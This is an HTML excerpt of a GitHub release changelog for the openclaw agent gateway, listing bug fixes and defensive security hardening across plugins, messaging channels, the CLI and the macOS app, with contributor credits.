<li>Plugins/runtime-deps: keep bundled provider policy config loading from staging plugin runtime dependencies, so config reads no longer fail on locked-down <code>/var/lib/openclaw/plugin-runtime-deps</code> directories. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356579392" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74971" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74971/hovercard" href="https://github.com/openclaw/openclaw/issues/74971">#74971</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eurojojo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eurojojo">@eurojojo</a>.</li>
<li>Plugins/runtime-deps: always write a dependency map in generated runtime-deps install manifests, so npm does not crash or prune staged bundled-plugin packages when the plan is empty. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356326245" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74949" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74949/hovercard" href="https://github.com/openclaw/openclaw/issues/74949">#74949</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>Security/outbound: strip re-formed HTML tags during plain-text sanitization so nested tag fragments cannot leave a CodeQL-detected <code>&lt;script&gt;</code> sequence behind. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Security/secrets: compare credential bytes with padded timing-safe buffers instead of hashing candidate passwords before equality checks. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Security/QQBot: sanitize debug log arguments before writing to <code>console.*</code>, so gateway payload fields cannot forge extra log lines when debug logging is enabled. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>QQBot: unify slash command auth and c2cOnly gating in the command registry, pass <code>allowQQBotDataDownloads</code> when sending slash command file attachments, align clear-storage with actual downloads directory, and add <code>/bot-me</code> to display sender user ID. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344118368" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73616" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73616/hovercard" href="https://github.com/openclaw/openclaw/pull/73616">#73616</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cxyhhhhh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cxyhhhhh">@cxyhhhhh</a>.</li>
<li>CLI/agents/status: keep <code>openclaw agents</code>, text <code>agents list</code>, and plain text <code>status</code> on read-only metadata paths so human output no longer preloads plugin runtimes or live channel scans before printing. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348784023" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74195" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74195/hovercard" href="https://github.com/openclaw/openclaw/issues/74195">#74195</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NianJiuZst/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NianJiuZst">@NianJiuZst</a>.</li>
<li>Agents/local models: derive context-window guard thresholds from the effective model window with 4k/8k safety floors, so small local models are no longer rejected by fixed 16k/32k preflight cutoffs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4056859962" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42999" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42999/hovercard" href="https://github.com/openclaw/openclaw/issues/42999">#42999</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chengjialu8888/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chengjialu8888">@chengjialu8888</a>.</li>
<li>PDF extraction: resolve PDF.js standard fonts from the installed package root and pass a filesystem path to the Node fallback extractor, so built-in font PDFs render without <code>file://</code> URL lookup failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4111579816" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51455" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51455/hovercard" href="https://github.com/openclaw/openclaw/issues/51455">#51455</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320477272" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70936" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70936/hovercard" href="https://github.com/openclaw/openclaw/pull/70936">#70936</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4134943079" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54447" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54447/hovercard" href="https://github.com/openclaw/openclaw/pull/54447">#54447</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4214513630" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62175" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62175/hovercard" href="https://github.com/openclaw/openclaw/pull/62175">#62175</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/anyech/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/anyech">@anyech</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JuanRdBO/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JuanRdBO">@JuanRdBO</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/solomonneas/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/solomonneas">@solomonneas</a>.</li>
<li>Media: treat legacy Word/OLE attachments with <code>application/msword</code> or <code>application/x-cfb</code> MIME as binary so printable-looking <code>.doc</code> files are not embedded into prompts as text. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4131935972" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54176" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54176/hovercard" href="https://github.com/openclaw/openclaw/issues/54176">#54176</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4133810089" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54380" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54380/hovercard" href="https://github.com/openclaw/openclaw/pull/54380">#54380</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/andyliu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/andyliu">@andyliu</a>.</li>
<li>Config: accept documented <code>browser.tabCleanup</code> keys in strict root config validation, so configured tab cleanup no longer fails before runtime reads it. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353207232" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74577" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74577/hovercard" href="https://github.com/openclaw/openclaw/issues/74577">#74577</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lonexreb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lonexreb">@lonexreb</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ezdlp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ezdlp">@ezdlp</a>.</li>
<li>Cron: validate disabled job schedule edits before persisting updates, so invalid cron changes no longer partially mutate stored jobs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351895210" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74459" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74459/hovercard" href="https://github.com/openclaw/openclaw/issues/74459">#74459</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yfge/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yfge">@yfge</a>.</li>
<li>CLI/cron: warn when <code>openclaw cron add --message</code> omits a nonblank <code>--agent</code>, including blank agent values and session-key jobs, so scheduled agent-turn jobs make default-agent fallback explicit while system events stay quiet. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4051936623" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42196" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42196/hovercard" href="https://github.com/openclaw/openclaw/issues/42196">#42196</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4052315763" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42245" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/42245/hovercard" href="https://github.com/openclaw/openclaw/pull/42245">#42245</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ethanclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ethanclaw">@ethanclaw</a>.</li>
<li>CLI/progress: suppress nested progress spinners and line clears while TUI input owns raw stdin, so Crestodian <code>/status</code> no longer disturbs the active input row. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356940813" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75003" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75003/hovercard" href="https://github.com/openclaw/openclaw/pull/75003">#75003</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/velvet-shark/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/velvet-shark">@velvet-shark</a>.</li>
<li>Channels/status: keep Telegram, Slack, and Google Chat read-only allowlist/default-target accessors on config-only paths, so status and channel summaries do not resolve SecretRef-backed runtime credentials. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eusine/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eusine">@eusine</a>.</li>
<li>Telegram: use durable message edits for streaming previews instead of native draft state, so generated replies no longer flicker through draft-to-message transitions that look like duplicates. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358015486" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75073" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75073/hovercard" href="https://github.com/openclaw/openclaw/pull/75073">#75073</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Telegram: clamp low long-polling client timeouts so configured <code>timeoutSeconds</code> values below the <code>getUpdates</code> poll window no longer force a fresh HTTPS connection every few seconds. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358955789" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75114" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75114/hovercard" href="https://github.com/openclaw/openclaw/issues/75114">#75114</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hpinho77/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hpinho77">@hpinho77</a>.</li>
<li>Active Memory: clarify the deprecated <code>modelFallbackPolicy</code> warning and config help so <code>modelFallback</code> is described as a chain-resolution last resort, not runtime failover. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353454562" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74602" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74602/hovercard" href="https://github.com/openclaw/openclaw/pull/74602">#74602</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jeffrey701/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jeffrey701">@jeffrey701</a>.</li>
<li>Channels/Discord: keep read-only allowlist/default-target accessors from resolving SecretRef-backed bot tokens, so status and channel summaries no longer fail when tokens are only available in gateway runtime. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354779461" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74737" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74737/hovercard" href="https://github.com/openclaw/openclaw/pull/74737">#74737</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eusine/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eusine">@eusine</a>.</li>
<li>Gateway/sessions: align session abort wait semantics across <code>chat</code>, <code>agent</code>, and <code>sessions</code> server methods so abort RPCs return after the targeted sessions actually halt instead of resolving early while runs are still draining. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354883943" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74751" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74751/hovercard" href="https://github.com/openclaw/openclaw/pull/74751">#74751</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>Agents/output: drop copied inbound metadata-only assistant replay turns before provider replay instead of synthesizing a placeholder, so Telegram and other channels cannot receive <code>[assistant copied inbound metadata omitted]</code> as model output. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354851470" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74745" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74745/hovercard" href="https://github.com/openclaw/openclaw/issues/74745">#74745</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/adamwdear/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/adamwdear">@adamwdear</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Marvae/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Marvae">@Marvae</a>.</li>
<li>Doctor/memory: suppress skipped embedding-readiness warnings for key-optional providers such as Ollama and LM Studio while preserving timeout and not-ready diagnostics. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353533459" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74608" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74608/hovercard" href="https://github.com/openclaw/openclaw/issues/74608">#74608</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347037109" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73882" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73882/hovercard" href="https://github.com/openclaw/openclaw/issues/73882">#73882</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>Channels/groups: preserve observe-only turn suppression for prepared dispatch paths and restore deprecated channel turn runtime aliases, so passive observer/group flows stay silent while older plugins keep compiling. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Feishu: skip empty-text messages (e.g. <code>{"text":""}</code>) that carry no media, so no blank user turn is written to the session and downstream LLM providers cannot reject the request with "messages must not be empty". (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353876867" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74634" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74634/hovercard" href="https://github.com/openclaw/openclaw/issues/74634">#74634</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xdengli/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xdengli">@xdengli</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>Feishu/Bitable: clean up newly created placeholder rows whose fields contain only default empty values while preserving meaningful link, attachment, user, number, boolean, and location values during create-app cleanup. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347281559" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73920" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73920/hovercard" href="https://github.com/openclaw/openclaw/pull/73920">#73920</a>) Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4043329694" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40602" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/40602/hovercard" href="https://github.com/openclaw/openclaw/pull/40602">#40602</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/boat2moon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/boat2moon">@boat2moon</a>.</li>
<li>macOS app: keep attach-only mode and the Debug Settings launchd toggle marker-only, so launching with <code>--attach-only</code>/<code>--no-launchd</code> no longer uninstalls the Gateway LaunchAgent or drops active sessions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330918206" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72174" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72174/hovercard" href="https://github.com/openclaw/openclaw/pull/72174">#72174</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DolencLuka/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DolencLuka">@DolencLuka</a>.</li>
<li>macOS Canvas: stop auto-reloading the current A2UI host during push/eval/snapshot flows, so pushed A2UI content remains visible instead of returning to the empty Canvas shell. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341063728" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73337" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73337/hovercard" href="https://github.com/openclaw/openclaw/issues/73337">#73337</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Gr4via/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Gr4via">@Gr4via</a>.</li>
<li>Plugin SDK: restore the deprecated <code>plugin-sdk/zalouser</code> command-auth facade so published Lark/Zalo plugins that import it load on current hosts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354621148" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74702" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74702/hovercard" href="https://github.com/openclaw/openclaw/issues/74702">#74702</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Goron01/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Goron01">@Goron01</a>.</li>
<li>Plugins/runtime-deps: include bundled provider plugins when <code>models.providers</code>, auth profiles, agent defaults, or subagent model refs configure that provider, while keeping inactive default-enabled provider plugins out of doctor repair. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350160379" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74307" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74307/hovercard" href="https://github.com/openclaw/openclaw/issues/74307">#74307</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Skeptomenos/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Skeptomenos">@Skeptomenos</a>.</li>
<li>Plugins/runtime: resolve relative plugin <code>api.resolvePath</code> inputs against the plugin root instead of the host working directory, while keeping absolute and home paths user-resolved. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354673479" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74718" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74718/hovercard" href="https://github.com/openclaw/openclaw/pull/74718">#74718</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jimdawdy-hub/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jimdawdy-hub">@jimdawdy-hub</a>.</li>
<li>Plugins/runtime-deps: refresh mirrored root chunks through a temporary file before replacing the active copy, so failed refreshes do not delete chunks that running plugin imports still need. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/runtime-deps: prefer <code>require</code> conditional exports when building staged dependency aliases, so CommonJS-only plugin runtime deps such as <code>ws</code> do not resolve to ESM wrappers under Jiti. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352876135" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74547" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74547/hovercard" href="https://github.com/openclaw/openclaw/issues/74547">#74547</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aderius/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aderius">@aderius</a>.</li>
<li>Bonjour/Gateway: cap flapping advertiser restarts in a sliding window, so mDNS probing/name-conflict loops disable discovery instead of churning indefinitely on constrained hosts. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348958904" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74209" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74209/hovercard" href="https://github.com/openclaw/openclaw/issues/74209">#74209</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349224957" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74242" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74242/hovercard" href="https://github.com/openclaw/openclaw/pull/74242">#74242</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ndj888/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ndj888">@ndj888</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Sanjays2402/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Sanjays2402">@Sanjays2402</a>.</li>
<li>Plugins/runtime-deps: verify staged package entry files before reusing mirrored runtime roots, so browser-control repairs incomplete <code>ajv</code>/MCP SDK installs after update instead of failing after restart on a missing <code>ajv/dist/ajv.js</code>. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353810195" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74630" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74630/hovercard" href="https://github.com/openclaw/openclaw/issues/74630">#74630</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/spickeringlr/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/spickeringlr">@spickeringlr</a>.</li>
<li>Heartbeat: resolve <code>responsePrefix</code> template variables with the selected provider, model, and thinking context before delivering alerts or suppressing prefixed <code>HEARTBEAT_OK</code> replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4057207695" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43064" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/43064/hovercard" href="https://github.com/openclaw/openclaw/issues/43064">#43064</a>; repairs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4057211022" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43065" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/43065/hovercard" href="https://github.com/openclaw/openclaw/pull/43065">#43065</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4077564180" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46858" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/46858/hovercard" href="https://github.com/openclaw/openclaw/pull/46858">#46858</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yweiii/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yweiii">@yweiii</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JunJD/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JunJD">@JunJD</a>.</li>
<li>Memory/LanceDB: show full memory UUIDs in the <code>memory_forget</code> candidate list so agents can pass the displayed ID back to targeted deletion without hitting the full-UUID validator. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265695758" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66913" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66913/hovercard" href="https://github.com/openclaw/openclaw/pull/66913">#66913</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amittell/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amittell">@amittell</a>.</li>
<li>File-transfer plugin: require canonical read-path preflight authorization for <code>file.fetch</code>, fail closed when <code>dir.fetch</code> preflight entries are missing, absolute, or traversing, and recheck returned archive entries before handing archive bytes to callers. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348342550" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74134" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74134/hovercard" href="https://github.com/openclaw/openclaw/pull/74134">#74134</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/omarshahine/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/omarshahine">@omarshahine</a>.</li>
<li>Channels/Feishu: retry file-typed iOS video resource downloads as <code>media</code> after a Feishu/Lark HTTP 502 and preserve the original 502 when the fallback also fails. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4095635032" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49855" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/49855/hovercard" href="https://github.com/openclaw/openclaw/issues/49855">#49855</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4098933775" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50164" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/50164/hovercard" href="https://github.com/openclaw/openclaw/pull/50164">#50164</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347465827" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73986" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73986/hovercard" href="https://github.com/openclaw/openclaw/pull/73986">#73986</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alex-xuweilong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alex-xuweilong">@alex-xuweilong</a>.</li>
